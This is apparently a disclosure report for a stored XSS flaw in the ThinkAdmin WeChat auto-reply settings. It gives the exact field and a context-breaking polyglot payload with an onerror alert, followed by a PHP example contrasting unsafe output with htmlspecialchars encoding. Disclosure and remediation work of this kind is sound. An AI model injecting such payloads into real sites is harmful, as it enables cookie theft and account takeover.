Cross-site Scripting (XSS) - Stored in zoujingli/thinkadmin
Sep 17th 2021
Proof of Concept
In WeChat management, at the features Reply rule management - Follow reply configuration - Default reply configuration - Follow automatic replies, save the Reply text with this payload:
</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<iMg SrC="x" oNeRRor="alert(1);">\x3e
The XSS triggers when the page is reloaded or when going to edit.
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
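The fix for this class of bug is to encode the stored reply text for the HTML context when it is written back into the edit form. The sketch below is an added example, not ThinkAdmin's code: the function names and the `content` field name are hypothetical, and the sample value is the reply text from this report.

```php
<?php
// Added illustration; not taken from the ThinkAdmin code base.
// Function names and the "content" field name are hypothetical.

// Constructed sample: the reply text from the report, as read back from storage.
// Single quotes keep "\x3c" as the literal characters the report shows.
$stored = '</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<iMg SrC="x" oNeRRor="alert(1);">\x3e';

// Vulnerable pattern: the stored text is interpolated into the edit form as-is,
// so "</teXtarEa/" ends the field and the markup after it is parsed as HTML.
function render_edit_unsafe(string $reply): string
{
    return '<textarea name="content">' . $reply . '</textarea>';
}

// Hardened pattern: encode at output time. <, >, &, " and ' become entities,
// so the browser shows the text inside the field instead of parsing it.
function render_edit_safe(string $reply): string
{
    $encoded = htmlspecialchars($reply, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<textarea name="content">' . $encoded . '</textarea>';
}

// Rough check: how many things that look like tags does the markup contain?
// A correctly encoded field contributes only its own opening and closing tag.
function count_tags(string $html): int
{
    return (int) preg_match_all('~</?[a-z][^>]*>~i', $html);
}

$rendered = [
    'unsafe' => render_edit_unsafe($stored),
    'safe'   => render_edit_safe($stored),
];
foreach ($rendered as $name => $html) {
    printf("%-6s tags=%d\n%s\n\n", $name, count_tags($html), $html);
}

// Encoding is lossless: decoding what the browser shows gives back the
// administrator's original text, so nothing has to be stripped on save.
$encoded = htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
var_dump(html_entity_decode($encoded, ENT_QUOTES, 'UTF-8') === $stored);
```

Marking the session cookie `HttpOnly` limits the cookie-theft impact described above, but it does not stop the injected script from running, so the output encoding is still required.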